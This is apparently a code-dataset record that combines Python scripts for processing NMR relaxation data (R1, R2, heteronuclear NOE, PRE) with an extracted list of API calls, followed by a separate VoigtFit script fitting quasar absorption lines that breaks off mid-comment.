if verbose >= 1:
print("Loading intensities from '{0}'".format(infile))
parameters, intensity = nmrglue.pipe.read(infile)
hydrogen = nmrglue.pipe.make_uc(parameters, intensity,
dim=1).ppm_scale()
nitrogen = nmrglue.pipe.make_uc(parameters, intensity,
dim=0).ppm_scale()
def calc_intensity(peak, **kwargs):
H_index = np.argmin((hydrogen - peak["1H"]) ** 2)
N_index = np.argmin((nitrogen - peak["15N"]) ** 2)
return intensity[N_index, H_index]
relax["{0} ms".format(delay)] = relax.apply(calc_intensity, axis=1)
# Calculate relaxation rates
delays = np.array(delays, np.float64) / 1000
def calc_relax(peak, **kwargs):
if verbose >= 1:
print("Calculating relaxation for {0}".format(peak.name))
def model_function(delay, intensity, relaxation):
return intensity * np.exp(-1 * delay * relaxation)
I = np.array(peak.filter(regex=(".*ms")).values, np.float64)
I0, R = curve_fit(model_function, delays, I, p0=(I[0], 1.0))[0]
# Calculate error
if error_method == "rmse":
error = np.sqrt(np.mean((I - model_function(delays, I0, R)) ** 2))
elif error_method == "mae":
error = np.mean(np.sqrt((I - model_function(delays, I0, R)) ** 2))
# Construct synthetic relaxation profiles
synth_datasets = np.zeros((n_synth_datasets, I.size))
for i, I_mean in enumerate(model_function(delays, I0, R)):
synth_datasets[:, i] = np.random.normal(I_mean, error,
n_synth_datasets)
def synth_fit_decay(synth_intensity):
try:
synth_I0, synth_R = \
curve_fit(model_function, delays, synth_intensity,
p0=(I0, R))[0]
return synth_R
except RuntimeError:
if verbose >= 1:
print("Unable to calculate standard error for {0}".format(
peak.name))
return np.nan
# Calculate standard error
synth_Rs = multiprocess_map(synth_fit_decay, synth_datasets, 16)
R_se = np.std(synth_Rs)
return pd.Series([I0, R, R_se])
# Calculate relaxation rates and standard errors
fit = relax.apply(calc_relax, axis=1)
fit.columns = ["I0", relax_type, relax_type + " se"]
relax = relax.join(fit)
# Write outfile
if verbose >= 1:
print("Writing outfile '{0}'".format(outfile))
columns = [relax.index.name] + list(relax.columns.values)
header = "{0:<11s}".format(columns.pop(0))
for column in columns:
header += "{0:>12s}".format(column)
fmt = ["%12s", "%11.4f", "%11.4f"] + ["%11d"] * len(delays) + ["%11d",
"%11.4f", "%11.4f"]
np.savetxt(outfile, np.column_stack((relax.index.values, relax.values)),
fmt=fmt, header=header, comments='#')
def process_hetnoe(peaklist, infiles, outfile, verbose=1, debug=0, **kwargs):
"""
"""
from glob import glob
from os.path import expandvars
import nmrglue
import numpy as np
import pandas as pd
# Process arguments
processed_infiles = []
for infile in infiles:
processed_infiles += glob(expandvars(infile))
infiles = processed_infiles
if len(infiles) != 2:
raise ()
peaklist = expandvars(peaklist)
outfile = expandvars(outfile)
# Load peaklist
if verbose >= 1:
print("Loading peaklist from '{0}'".format(peaklist))
def convert_name(name):
return "{0}:{1}".format(name[-4:-1].upper(), name[2:-4])
relax = pd.read_csv(peaklist, sep="\t", usecols=[2, 3, 4], index_col=2,
converters={4: convert_name}, names=["1H", "15N", "residue"], skiprows=1)
# Load peak intensities from spectra
def calc_intensity(peak, **kwargs):
H_index = np.argmin((hydrogen - peak["1H"]) ** 2)
N_index = np.argmin((nitrogen - peak["15N"]) ** 2)
return intensity[N_index, H_index]
if verbose >= 1:
print("Loading intensities from '{0}'".format(infiles[0]))
parameters, intensity = nmrglue.pipe.read(infiles[0])
hydrogen = nmrglue.pipe.make_uc(parameters, intensity, dim=1).ppm_scale()
nitrogen = nmrglue.pipe.make_uc(parameters, intensity, dim=0).ppm_scale()
hydrogen += 0.0612858
nitrogen += 0.08399
relax["sat"] = relax.apply(calc_intensity, axis=1)
sat_se = intensity[np.logical_and(intensity > -intensity.std(),
intensity < intensity.std())].std()
print(sat_se)
sat_se = 54588.8
print(sat_se)
if verbose >= 1:
print("Loading intensities from '{0}'".format(infiles[1]))
parameters, intensity = nmrglue.pipe.read(infiles[1])
relax["nosat"] = relax.apply(calc_intensity, axis=1)
nosat_se = intensity[np.logical_and(intensity > -intensity.std(),
intensity < intensity.std())].std()
print(nosat_se)
nosat_se = 58479.8
print(nosat_se)
relax["noe"] = relax["sat"] / relax["nosat"]
relax["noe se"] = np.sqrt(
(sat_se / relax["sat"]) ** 2 + (nosat_se / relax["nosat"]) ** 2) * relax[
"noe"]
# Write outfile
if verbose >= 1:
print("Writing outfile '{0}'".format(outfile))
columns = [relax.index.name] + list(relax.columns.values)
header = "{0:<11s}".format(columns.pop(0))
for column in columns:
header += "{0:>12s}".format(column)
fmt = ["%12s", "%11.4f", "%11.4f"] + ["%11d"] * 2 + ["%11.4f", "%11.4f"]
np.savetxt(outfile, np.column_stack((relax.index.values, relax.values)),
fmt=fmt, header=header, comments='#')
def process_pre(dia_infile, para_infile, outfile, verbose=1, debug=0,
**kwargs):
"""
"""
from glob import glob
from os.path import expandvars
import numpy as np
import pandas as pd
# Process arguments
dia_infile = glob(expandvars(dia_infile))[0]
para_infile = glob(expandvars(para_infile))[0]
if verbose >= 1:
print(
"Loading diamagnetic relaxation rates from '{0}'".format(dia_infile))
dia_relax = pd.read_csv(dia_infile, index_col=0, delimiter=r"\s\s+")
dia_relax.index.name = "residue"
dia_relax.rename(
columns={"I0": "dia I0", "I0 se": "dia I0 se", "r2": "dia r2",
"r2 se": "dia r2 se", }, inplace=True)
if verbose >= 1:
print("Loading paramagnetic relaxation rates from '{0}'".format(
para_infile))
para_relax = pd.read_csv(para_infile, index_col=0, delimiter=r"\s\s+")
para_relax.index.name = "residue"
para_relax.rename(
columns={"I0": "para I0", "I0 se": "para I0 se", "r2": "para r2",
"r2 se": "para r2 se", }, inplace=True)
relax = dia_relax[
["1H", "15N", "dia I0", "dia I0 se", "dia r2", "dia r2 se"]]
relax = pd.concat(
(relax, para_relax[["para I0", "para I0 se", "para r2", "para r2 se"]]),
axis=1)
# //@formatter:off
relax["I/I0"] = relax["para I0"] / relax["dia I0"]
relax["I/I0 se"] = np.sqrt(relax["I/I0"] ** 2 * \
((relax["para I0 se"] / relax["para I0"]) ** 2 + \
(relax["dia I0 se"] / relax["dia I0"]) ** 2))
relax["r20/r2"] = relax["dia r2"] / relax["para r2"]
relax["r20/r2 se"] = np.sqrt(relax["r20/r2"] ** 2 * \
((relax["dia r2 se"] / relax["dia r2"]) ** 2 + \
(relax["para r2 se"] / relax["para r2"]) ** 2))
relax["rho2"] = relax["para r2"] - relax["dia r2"]
relax["rho2 se"] = np.sqrt(
relax["para r2 se"] ** 2 + relax["dia r2 se"] ** 2)
# //@formatter:on
# Write outfile
if verbose >= 1:
print("Writing outfile '{0}'".format(outfile))
columns = [relax.index.name] + list(relax.columns.values)
header = "{0:<11s}".format(columns.pop(0))
for column in columns:
header += "{0:>12s}".format(column)
with open(outfile, "w") as out:
relax["dia I0"][np.isnan(relax["dia I0"])] = 0
relax["dia I0 se"][np.isnan(relax["dia I0 se"])] = 0
relax["para I0"][np.isnan(relax["para I0"])] = 0
relax["para I0 se"][np.isnan(relax["para I0 se"])] = 0
out.write("#" + header + "\n")
for residue in relax.index:
# This is an abonomination. Why is this the least painfil way to
# write a decent text file.
row = relax.loc[residue]
out.write("{0:12s} {1:11.2f} {2:11.1f} {3:11d} {4:11d} "
"{5:11.2f} {6:11.2f} {7:11d} {8:11d} {9:11.2f} "
"{10:11.2f} {11:11.3f} {12:11.3f} {13:11.3f} "
"{14:11.3f} {15:11.2f} {16:11.2f}\n".format(residue,
row["1H"], row["15N"], int(row["dia I0"]), int(row["dia I0 se"]),
row["dia r2"], row["dia r2 se"], int(row["para I0"]),
int(row["para I0 se"]), row["para r2"], row["para r2 se"],
row["I/I0"], row["I/I0 se"], row["r20/r2"], row["r20/r2 se"],
row["rho2"], row["rho2 se"]))
#################################### MAIN #####################################
if __name__ == "__main__":
import argparse
# Prepare argument parser
parser = argparse.ArgumentParser(description=__doc__,
formatter_class=argparse.RawTextHelpFormatter)
subparsers = parser.add_subparsers(dest="mode", description="")
# Prepare iRED subparser
ired_subparser = subparsers.add_parser(name="ired",
help="Process iRED data")
ired_subparser.set_defaults(function=process_ired)
input_group = ired_subparser.add_argument_group("input")
action_group = ired_subparser.add_argument_group("action")
output_group = ired_subparser.add_argument_group("output")
input_group.add_argument("-infile", required=True, dest="infiles",
nargs="+", type=str, help="""cpptraj output file(s) from
which to load datasets; may be plain text or compressed""")
input_group.add_argument("-indexfile", required=False, type=str,
help="""Text file from which to load residue names; if
omitted will be taken from columns of first infile""")
output_group.add_argument("-outfile", required=True, type=str,
help="Text file to which processed data will be output")
# Prepare error subparser
error_subparser = subparsers.add_parser(name="error", help="""Calculates
error of simulated relaxation relative to experiment""",
description="""Calculates error of simulated relaxation relative to
experiment. The intended use case is to break down errors relative to
experimental data collected at multiple magnetic fields or by multiple
groups, error(residue, measurement, magnet/group), into a form that
is easier to visualize and communicate, error(residue, measurement).
Reads in a series of input files containing simulated data and a
series of files containing corresponding experimental data. These
files are treated in pairs and the error between all data points
present in both(e.g. row 'GLN:2', column 'r1') calculated. Columns
ending in '_se' are treated as uncertainties, and are propogated into
uncertainties in the resulting errors rather than being averaged.
Take caution when processing datasets uncertainties alongside those
that do (experimental uncertainties are not always reported), as
the resulting uncertainties in the residuals will be incorrect.""")
error_subparser.set_defaults(function=process_error)
input_group = error_subparser.add_argument_group("input")
action_group = error_subparser.add_argument_group("action")
output_group = error_subparser.add_argument_group("output")
input_group.add_argument("-sim_infile", required=True, dest="sim_infiles",
nargs="+", type=str,
help="input file(s) from which to load simulation datasets")
input_group.add_argument("-exp_infile", required=True, dest="exp_infiles",
nargs="+", type=str,
help="input file(s) from which to load experimental datasets")
output_group.add_argument("-outfile", required=True, type=str,
help="Text file to which processed data will be output")
# Prepare relax subparser
relax_subparser = subparsers.add_parser(name="relax",
help="Process experimental R1 or R2 relaxation data")
relax_subparser.set_defaults(function=process_relax)
input_group = relax_subparser.add_argument_group("input")
action_group = relax_subparser.add_argument_group("action")
output_group = relax_subparser.add_argument_group("output")
relax_type = input_group.add_mutually_exclusive_group()
relax_type.add_argument("--r1", action="store_const", const="r1",
default="r1", dest="relax_type", help="process R1 relaxation data")
relax_type.add_argument("--r2", action="store_const", const="r2",
default="r1", dest="relax_type", help="process R2 relaxation data")
relax_type.add_argument("--pre-dia", action="store_const", const="dia",
default="r1", dest="relax_type",
help="process PRE diamagnetic relaxation data")
relax_type.add_argument("--pre-para", action="store_const", const="para",
default="r1", dest="relax_type",
help="process PRE paramagnetic relaxation data")
input_group.add_argument("-peaklist", required=True, type=str,
help="peak list (exported from ccpnmr)")
input_group.add_argument("-infile", required=True, dest="infiles",
metavar="INFILE", nargs="+", type=str,
help="NMR spectra (NMRPipe format)")
input_group.add_argument("-delay", required=True, dest="delays",
metavar="DELAY", nargs="+", type=str,
help="delays (ms); number of delays must match number of infiles")
action_group.add_argument("-synthetics", required=False,
dest="n_synth_datasets", default=100, type=int,
help="number of synthetic datasets to use to calculate error")
error_method = action_group.add_mutually_exclusive_group()
error_method.add_argument("--rmse", action="store_const", const="rmse",
default="rmse", dest="error_method",
help="use root mean square error to generate synthetic datasets")
error_method.add_argument("--mae", action="store_const", const="mae",
default="rmse", dest="error_method",
help="use mean absolute error to generate synthetic datasets")
output_group.add_argument("-outfile", required=True, type=str,
help="text file to which processed data will be output")
# Prepare hetnoe subparser
hetnoe_subparser = subparsers.add_parser(name="hetnoe",
help="Process experimental heteronuclear NOE relaxation data")
hetnoe_subparser.set_defaults(function=process_hetnoe)
input_group = hetnoe_subparser.add_argument_group("input")
action_group = hetnoe_subparser.add_argument_group("action")
output_group = hetnoe_subparser.add_argument_group("output")
input_group.add_argument("-peaklist", required=True, type=str,
help="peak list (exported from ccpnmr)")
input_group.add_argument("-infile", required=True, dest="infiles",
metavar="INFILE", nargs=2, type=str, help="NMR spectra (NMRPipe format)")
output_group.add_argument("-outfile", required=True, type=str,
help="text file to which processed data will be output")
# Prepare pre subparser
pre_subparser = subparsers.add_parser(name="pre",
help="Process experimental heteronuclear NOE relaxation data")
pre_subparser.set_defaults(function=process_pre)
input_group = pre_subparser.add_argument_group("input")
action_group = pre_subparser.add_argument_group("action")
output_group = pre_subparser.add_argument_group("output")
input_group.add_argument("-dia", required=True, dest="dia_infile",
metavar="DIA_INFILE", type=str, help="Diamagnetic relaxation rates")
input_group.add_argument("-para", required=True, dest="para_infile",
metavar="PARA_INFILE", type=str, help="Paramagnetic relaxation rates")
output_group.add_argument("-outfile", required=True, type=str,
help="text file to which processed data will be output")
# Verbosity
for p in subparsers.choices.values():
verbosity = p.add_mutually_exclusive_group()
verbosity.add_argument("-v", "--verbose", action="count", default=1,
help="enable verbose output, may be specified more than once")
verbosity.add_argument("-q", "--quiet", action="store_const", const=0,
default=1, dest="verbose", help="disable verbose output")
# Parse arguments and run selected function
kwargs = vars(parser.parse_args())
kwargs.pop("function")(**kwargs)
|
[
"numpy.abs",
"argparse.ArgumentParser",
"pandas.read_csv",
"numpy.argmin",
"numpy.isnan",
"numpy.exp",
"multiprocessing.Queue",
"numpy.random.normal",
"pandas.DataFrame",
"numpy.std",
"numpy.loadtxt",
"pandas.concat",
"re.match",
"scipy.optimize.curve_fit",
"os.path.expandvars",
"pandas.Series",
"re.compile",
"nmrglue.pipe.read",
"numpy.zeros",
"pandas.DataFrame.from_items",
"numpy.array",
"numpy.column_stack",
"nmrglue.pipe.make_uc",
"numpy.sqrt"
] |
[((1673, 1681), 'multiprocessing.Queue', 'Queue', (['(1)'], {}), '(1)\n', (1678, 1681), False, 'from multiprocessing import Queue, Process\n'), ((1698, 1705), 'multiprocessing.Queue', 'Queue', ([], {}), '()\n', (1703, 1705), False, 'from multiprocessing import Queue, Process\n'), ((5319, 5349), 'pandas.DataFrame.from_items', 'pd.DataFrame.from_items', (['items'], {}), '(items)\n', (5342, 5349), True, 'import pandas as pd\n'), ((8562, 8618), 'pandas.DataFrame', 'pd.DataFrame', (['(0.0)'], {'index': 'final_index', 'columns': 'final_cols'}), '(0.0, index=final_index, columns=final_cols)\n', (8574, 8618), True, 'import pandas as pd\n'), ((8632, 8686), 'pandas.DataFrame', 'pd.DataFrame', (['(0)'], {'index': 'final_index', 'columns': 'final_cols'}), '(0, index=final_index, columns=final_cols)\n', (8644, 8686), True, 'import pandas as pd\n'), ((10392, 10412), 'os.path.expandvars', 'expandvars', (['peaklist'], {}), '(peaklist)\n', (10402, 10412), False, 'from os.path import expandvars\n'), ((10427, 10446), 'os.path.expandvars', 'expandvars', (['outfile'], {}), '(outfile)\n', (10437, 10446), False, 'from os.path import expandvars\n'), ((10658, 10802), 'pandas.read_csv', 'pd.read_csv', (['peaklist'], {'sep': '"""\t"""', 'usecols': '[2, 3, 4]', 'index_col': '(2)', 'converters': '{(4): convert_name}', 'names': "['1H', '15N', 'residue']", 'skiprows': '(1)'}), "(peaklist, sep='\\t', usecols=[2, 3, 4], index_col=2, converters=\n {(4): convert_name}, names=['1H', '15N', 'residue'], skiprows=1)\n", (10669, 10802), True, 'import pandas as pd\n'), ((14293, 14313), 'os.path.expandvars', 'expandvars', (['peaklist'], {}), '(peaklist)\n', (14303, 14313), False, 'from os.path import expandvars\n'), ((14328, 14347), 'os.path.expandvars', 'expandvars', (['outfile'], {}), '(outfile)\n', (14338, 14347), False, 'from os.path import expandvars\n'), ((14559, 14703), 'pandas.read_csv', 'pd.read_csv', (['peaklist'], {'sep': '"""\t"""', 'usecols': '[2, 3, 4]', 'index_col': '(2)', 'converters': '{(4): convert_name}', 'names': "['1H', '15N', 'residue']", 'skiprows': '(1)'}), "(peaklist, sep='\\t', usecols=[2, 3, 4], index_col=2, converters=\n {(4): convert_name}, names=['1H', '15N', 'residue'], skiprows=1)\n", (14570, 14703), True, 'import pandas as pd\n'), ((15062, 15091), 'nmrglue.pipe.read', 'nmrglue.pipe.read', (['infiles[0]'], {}), '(infiles[0])\n', (15079, 15091), False, 'import nmrglue\n'), ((15638, 15667), 'nmrglue.pipe.read', 'nmrglue.pipe.read', (['infiles[1]'], {}), '(infiles[1])\n', (15655, 15667), False, 'import nmrglue\n'), ((17036, 17093), 'pandas.read_csv', 'pd.read_csv', (['dia_infile'], {'index_col': '(0)', 'delimiter': '"""\\\\s\\\\s+"""'}), "(dia_infile, index_col=0, delimiter='\\\\s\\\\s+')\n", (17047, 17093), True, 'import pandas as pd\n'), ((17406, 17464), 'pandas.read_csv', 'pd.read_csv', (['para_infile'], {'index_col': '(0)', 'delimiter': '"""\\\\s\\\\s+"""'}), "(para_infile, index_col=0, delimiter='\\\\s\\\\s+')\n", (17417, 17464), True, 'import pandas as pd\n'), ((17752, 17846), 'pandas.concat', 'pd.concat', (["(relax, para_relax[['para I0', 'para I0 se', 'para r2', 'para r2 se']])"], {'axis': '(1)'}), "((relax, para_relax[['para I0', 'para I0 se', 'para r2',\n 'para r2 se']]), axis=1)\n", (17761, 17846), True, 'import pandas as pd\n'), ((17958, 18085), 'numpy.sqrt', 'np.sqrt', (["(relax['I/I0'] ** 2 * ((relax['para I0 se'] / relax['para I0']) ** 2 + (\n relax['dia I0 se'] / relax['dia I0']) ** 2))"], {}), "(relax['I/I0'] ** 2 * ((relax['para I0 se'] / relax['para I0']) ** 2 +\n (relax['dia I0 se'] / relax['dia I0']) ** 2))\n", (17965, 18085), True, 'import numpy as np\n'), ((18181, 18310), 'numpy.sqrt', 'np.sqrt', (["(relax['r20/r2'] ** 2 * ((relax['dia r2 se'] / relax['dia r2']) ** 2 + (\n relax['para r2 se'] / relax['para r2']) ** 2))"], {}), "(relax['r20/r2'] ** 2 * ((relax['dia r2 se'] / relax['dia r2']) ** 2 +\n (relax['para r2 se'] / relax['para r2']) ** 2))\n", (18188, 18310), True, 'import numpy as np\n'), ((18402, 18461), 'numpy.sqrt', 'np.sqrt', (["(relax['para r2 se'] ** 2 + relax['dia r2 se'] ** 2)"], {}), "(relax['para r2 se'] ** 2 + relax['dia r2 se'] ** 2)\n", (18409, 18461), True, 'import numpy as np\n'), ((20067, 20163), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '__doc__', 'formatter_class': 'argparse.RawTextHelpFormatter'}), '(description=__doc__, formatter_class=argparse.\n RawTextHelpFormatter)\n', (20090, 20163), False, 'import argparse\n'), ((2899, 2977), 're.compile', 're.compile', (['"""^#Vec\\\\s+[\\\\w_]+\\\\[T1\\\\]\\\\s+[\\\\w_]+\\\\[T2\\\\]\\\\s+[\\\\w_]+\\\\[NOE\\\\]$"""'], {}), "('^#Vec\\\\s+[\\\\w_]+\\\\[T1\\\\]\\\\s+[\\\\w_]+\\\\[T2\\\\]\\\\s+[\\\\w_]+\\\\[NOE\\\\]$')\n", (2909, 2977), False, 'import re\n'), ((2993, 3032), 're.compile', 're.compile', (['"""^#Vec\\\\s+[\\\\w_]+\\\\[S2\\\\]$"""'], {}), "('^#Vec\\\\s+[\\\\w_]+\\\\[S2\\\\]$')\n", (3003, 3032), False, 'import re\n'), ((3040, 3068), 're.match', 're.match', (['re_t1t2noe', 'fields'], {}), '(re_t1t2noe, fields)\n', (3048, 3068), False, 'import re\n'), ((5676, 5725), 'numpy.column_stack', 'np.column_stack', (['(data.index.values, data.values)'], {}), '((data.index.values, data.values))\n', (5691, 5725), True, 'import numpy as np\n'), ((6583, 6642), 'pandas.read_csv', 'pd.read_csv', (['sim_infile'], {'delim_whitespace': '(True)', 'index_col': '(0)'}), '(sim_infile, delim_whitespace=True, index_col=0)\n', (6594, 6642), True, 'import pandas as pd\n'), ((6657, 6716), 'pandas.read_csv', 'pd.read_csv', (['exp_infile'], {'delim_whitespace': '(True)', 'index_col': '(0)'}), '(exp_infile, delim_whitespace=True, index_col=0)\n', (6668, 6716), True, 'import pandas as pd\n'), ((9745, 9796), 'numpy.column_stack', 'np.column_stack', (['(final.index.values, final.values)'], {}), '((final.index.values, final.values))\n', (9760, 9796), True, 'import numpy as np\n'), ((11015, 11040), 'nmrglue.pipe.read', 'nmrglue.pipe.read', (['infile'], {}), '(infile)\n', (11032, 11040), False, 'import nmrglue\n'), ((11566, 11594), 'numpy.array', 'np.array', (['delays', 'np.float64'], {}), '(delays, np.float64)\n', (11574, 11594), True, 'import numpy as np\n'), ((12330, 12366), 'numpy.zeros', 'np.zeros', (['(n_synth_datasets, I.size)'], {}), '((n_synth_datasets, I.size))\n', (12338, 12366), True, 'import numpy as np\n'), ((13107, 13123), 'numpy.std', 'np.std', (['synth_Rs'], {}), '(synth_Rs)\n', (13113, 13123), True, 'import numpy as np\n'), ((13140, 13164), 'pandas.Series', 'pd.Series', (['[I0, R, R_se]'], {}), '([I0, R, R_se])\n', (13149, 13164), True, 'import pandas as pd\n'), ((13750, 13801), 'numpy.column_stack', 'np.column_stack', (['(relax.index.values, relax.values)'], {}), '((relax.index.values, relax.values))\n', (13765, 13801), True, 'import numpy as np\n'), ((14803, 14842), 'numpy.argmin', 'np.argmin', (["((hydrogen - peak['1H']) ** 2)"], {}), "((hydrogen - peak['1H']) ** 2)\n", (14812, 14842), True, 'import numpy as np\n'), ((14861, 14901), 'numpy.argmin', 'np.argmin', (["((nitrogen - peak['15N']) ** 2)"], {}), "((nitrogen - peak['15N']) ** 2)\n", (14870, 14901), True, 'import numpy as np\n'), ((15972, 16044), 'numpy.sqrt', 'np.sqrt', (["((sat_se / relax['sat']) ** 2 + (nosat_se / relax['nosat']) ** 2)"], {}), "((sat_se / relax['sat']) ** 2 + (nosat_se / relax['nosat']) ** 2)\n", (15979, 16044), True, 'import numpy as np\n'), ((16472, 16523), 'numpy.column_stack', 'np.column_stack', (['(relax.index.values, relax.values)'], {}), '((relax.index.values, relax.values))\n', (16487, 16523), True, 'import numpy as np\n'), ((3093, 3129), 'numpy.loadtxt', 'np.loadtxt', (['infile'], {'dtype': 'np.float32'}), '(infile, dtype=np.float32)\n', (3103, 3129), True, 'import numpy as np\n'), ((3314, 3348), 'pandas.read_csv', 'pd.read_csv', (['infile'], {}), '(infile, **read_csv_kw)\n', (3325, 3348), True, 'import pandas as pd\n'), ((3504, 3527), 're.match', 're.match', (['re_s2', 'fields'], {}), '(re_s2, fields)\n', (3512, 3527), False, 'import re\n'), ((7644, 7681), 'numpy.abs', 'np.abs', (['(exp[err_cols] - sim[err_cols])'], {}), '(exp[err_cols] - sim[err_cols])\n', (7650, 7681), True, 'import numpy as np\n'), ((7684, 7705), 'numpy.abs', 'np.abs', (['exp[err_cols]'], {}), '(exp[err_cols])\n', (7690, 7705), True, 'import numpy as np\n'), ((10272, 10290), 'os.path.expandvars', 'expandvars', (['infile'], {}), '(infile)\n', (10282, 10290), False, 'from os.path import expandvars\n'), ((11292, 11331), 'numpy.argmin', 'np.argmin', (["((hydrogen - peak['1H']) ** 2)"], {}), "((hydrogen - peak['1H']) ** 2)\n", (11301, 11331), True, 'import numpy as np\n'), ((11354, 11394), 'numpy.argmin', 'np.argmin', (["((nitrogen - peak['15N']) ** 2)"], {}), "((nitrogen - peak['15N']) ** 2)\n", (11363, 11394), True, 'import numpy as np\n'), ((11942, 11994), 'scipy.optimize.curve_fit', 'curve_fit', (['model_function', 'delays', 'I'], {'p0': '(I[0], 1.0)'}), '(model_function, delays, I, p0=(I[0], 1.0))\n', (11951, 11994), False, 'from scipy.optimize import curve_fit\n'), ((12469, 12518), 'numpy.random.normal', 'np.random.normal', (['I_mean', 'error', 'n_synth_datasets'], {}), '(I_mean, error, n_synth_datasets)\n', (12485, 12518), True, 'import numpy as np\n'), ((14183, 14201), 'os.path.expandvars', 'expandvars', (['infile'], {}), '(infile)\n', (14193, 14201), False, 'from os.path import expandvars\n'), ((15107, 15157), 'nmrglue.pipe.make_uc', 'nmrglue.pipe.make_uc', (['parameters', 'intensity'], {'dim': '(1)'}), '(parameters, intensity, dim=1)\n', (15127, 15157), False, 'import nmrglue\n'), ((15185, 15235), 'nmrglue.pipe.make_uc', 'nmrglue.pipe.make_uc', (['parameters', 'intensity'], {'dim': '(0)'}), '(parameters, intensity, dim=0)\n', (15205, 15235), False, 'import nmrglue\n'), ((16825, 16847), 'os.path.expandvars', 'expandvars', (['dia_infile'], {}), '(dia_infile)\n', (16835, 16847), False, 'from os.path import expandvars\n'), ((16875, 16898), 'os.path.expandvars', 'expandvars', (['para_infile'], {}), '(para_infile)\n', (16885, 16898), False, 'from os.path import expandvars\n'), ((18828, 18853), 'numpy.isnan', 'np.isnan', (["relax['dia I0']"], {}), "(relax['dia I0'])\n", (18836, 18853), True, 'import numpy as np\n'), ((18886, 18914), 'numpy.isnan', 'np.isnan', (["relax['dia I0 se']"], {}), "(relax['dia I0 se'])\n", (18894, 18914), True, 'import numpy as np\n'), ((18945, 18971), 'numpy.isnan', 'np.isnan', (["relax['para I0']"], {}), "(relax['para I0'])\n", (18953, 18971), True, 'import numpy as np\n'), ((19005, 19034), 'numpy.isnan', 'np.isnan', (["relax['para I0 se']"], {}), "(relax['para I0 se'])\n", (19013, 19034), True, 'import numpy as np\n'), ((3552, 3588), 'numpy.loadtxt', 'np.loadtxt', (['infile'], {'dtype': 'np.float32'}), '(infile, dtype=np.float32)\n', (3562, 3588), True, 'import numpy as np\n'), ((3744, 3778), 'pandas.read_csv', 'pd.read_csv', (['infile'], {}), '(infile, **read_csv_kw)\n', (3755, 3778), True, 'import pandas as pd\n'), ((3912, 3947), 'numpy.loadtxt', 'np.loadtxt', (['indexfile'], {'dtype': 'np.str'}), '(indexfile, dtype=np.str)\n', (3922, 3947), True, 'import numpy as np\n'), ((9326, 9345), 'numpy.sqrt', 'np.sqrt', (['final[col]'], {}), '(final[col])\n', (9333, 9345), True, 'import numpy as np\n'), ((11060, 11110), 'nmrglue.pipe.make_uc', 'nmrglue.pipe.make_uc', (['parameters', 'intensity'], {'dim': '(1)'}), '(parameters, intensity, dim=1)\n', (11080, 11110), False, 'import nmrglue\n'), ((11152, 11202), 'nmrglue.pipe.make_uc', 'nmrglue.pipe.make_uc', (['parameters', 'intensity'], {'dim': '(0)'}), '(parameters, intensity, dim=0)\n', (11172, 11202), False, 'import nmrglue\n'), ((11824, 11855), 'numpy.exp', 'np.exp', (['(-1 * delay * relaxation)'], {}), '(-1 * delay * relaxation)\n', (11830, 11855), True, 'import numpy as np\n'), ((12655, 12717), 'scipy.optimize.curve_fit', 'curve_fit', (['model_function', 'delays', 'synth_intensity'], {'p0': '(I0, R)'}), '(model_function, delays, synth_intensity, p0=(I0, R))\n', (12664, 12717), False, 'from scipy.optimize import curve_fit\n'), ((4201, 4228), 'pandas.concat', 'pd.concat', (['r1r2noe_datasets'], {}), '(r1r2noe_datasets)\n', (4210, 4228), True, 'import pandas as pd\n'), ((4275, 4302), 'pandas.concat', 'pd.concat', (['r1r2noe_datasets'], {}), '(r1r2noe_datasets)\n', (4284, 4302), True, 'import pandas as pd\n'), ((4943, 4965), 'pandas.concat', 'pd.concat', (['s2_datasets'], {}), '(s2_datasets)\n', (4952, 4965), True, 'import pandas as pd\n'), ((5007, 5029), 'pandas.concat', 'pd.concat', (['s2_datasets'], {}), '(s2_datasets)\n', (5016, 5029), True, 'import pandas as pd\n'), ((7968, 8036), 'numpy.sqrt', 'np.sqrt', (['(exp[err_se_cols].values ** 2 + sim[err_se_cols].values ** 2)'], {}), '(exp[err_se_cols].values ** 2 + sim[err_se_cols].values ** 2)\n', (7975, 8036), True, 'import numpy as np\n')]
|
import numpy as np
import matplotlib.pyplot as plt
import VoigtFit
import pickle
### Fit DLA towards quasar Q1313+1441
### Observed in X-shooter P089.A-0068
z_DLA = 1.7941
logNHI = 21.3, 0.1 # value, uncertainty
# If log(NHI) is not known use:
#logNHI = None
#### Load UVB and VIS data:
UVB_fname = 'data/test_UVB_1d.spec'
res_UVB = 8000
VIS_fname = 'data/test_VIS_1d.spec'
res_VIS = 11800
wl_uvb, spec_uvb, err_uvb = np.loadtxt(UVB_fname, unpack=True)
wl_vis, spec_vis, err_vis = np.loadtxt(VIS_fname, unpack=True)
dataset = VoigtFit.DataSet(z_DLA)
dataset.add_data(wl_uvb, spec_uvb, 299792./res_UVB, err=err_uvb, normalized=False)
dataset.add_data(wl_vis, spec_vis, 299792./res_VIS, err=err_vis, normalized=False)
### Define absorption lines:
dataset.add_line('FeII_2374')
dataset.add_line('FeII_2260')
dataset.add_line('CrII_2056')
dataset.add_line('CrII_2066')
dataset.add_line('CrII_2026')
dataset.add_line('ZnII_2026')
dataset.add_line('MgI_2026')
dataset.add_line('MgI_2852')
### This command prepares the line regions:
# First the data are interactively normalized
# Then regions which should not be fitted are masked interactively too
dataset.prepare_dataset()
# Save the dataset so you don't have to normalize and mask every time:
VoigtFit.SaveDataSet('test.dataset', dataset)
### The dataset which was defined above can be loaded like this:
# In this case, comment out lines 18-41
#dataset = VoigtFit.LoadDataSet('test.dataset')
### If a line has been defined, and you don't want to fit it
### it can either be removed from the dataset completely:
#dataset.remove_line('CrII_2056')
### or deactivated:
#dataset.deactivate_line('FeII_2374')
dataset.reset_components()
### Add velocity components for each ion:
# ion z b logN
dataset.add_component('FeII', 1.793532, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794060, 20, 15.0, var_z=1)
dataset.add_component('FeII', 1.794282, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794722, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.795121, 15, 14.5, var_z=1, var_b=1)
#
# Options for the components:
# var_z=1/0 vary redshift for this component
# var_b=1/0 vary b-parameter for this component
# var_N=1/0 vary column density for this component
#
# Redshift and b-parameters can be tied.
# passing the option 'tie_z=z0_FeII' ties the redshift to the first component of FeII
# passing the option 'tie_b=b2_SiII' ties the b-parameter to the third component of SiII
#
# NOTE - the ion must be defined and the component index starts with 0
#
# The entire velocity structure can be copied from one ion to another:
dataset.copy_components('ZnII', 'FeII', logN=12.9, ref_comp=1)
# This copies the five components defined for FeII to ZnII and keeps
